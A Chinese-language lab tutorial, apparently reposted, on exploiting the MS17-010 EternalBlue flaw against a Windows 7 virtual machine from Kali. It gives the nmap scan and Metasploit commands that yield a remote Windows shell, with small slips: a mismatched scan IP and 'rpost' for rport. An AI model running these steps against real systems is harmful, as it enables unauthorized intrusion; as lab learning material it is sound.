利用永恆之藍漏洞(ms17_010)滲透攻擊windows


作者:Xdong

滲透之路,路漫漫其修遠兮。

實驗環境:

兩台虛擬機:

  攻擊機kali:192.168.31.182

  靶機windows7 : 192.168.31.235

工具:metasploit、nmap

注:兩台虛擬機需要在同一局域網下。為了能順利完成本實驗,首先要保證兩台機子能相互ping通。建議兩台虛擬機網絡適配器都設成橋接模式。

第一步:掃描目標機器

 nmap -sV -p 0-65535 192.168.31.65

可以看到靶機的445端口處於開啟狀態。

注:靶機掃描既可以在kali命令窗口掃描,也可以在啟動metasploit控制台后,在metasploit控制掃描。

 

第二步:啟動Metasploit控制台

msfconsole 

 

 

第三步:使用ms17_010漏洞

use exploit/windows/smb/ms17_010_eternalblue

 

 

 第四步:查看漏洞配置

 show options 

 

 

 

第五步:設置攻擊目標的ip和端口

set rhost 192.168.31.235

set rpost  445

 

 

 

 

第六步:滲透攻擊

run

 

  到此,滲透成功,成功的從遠程系統上拿到Windows命令行的Shell。可以在shell界面輸入systeminfo測試。

 

 目標回顯的信息呈現中文亂碼,kali終端字體默認是UTF-8,將其改為gb2312就行了。

 

 

 

 

 

 

------------恢復內容結束------------


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM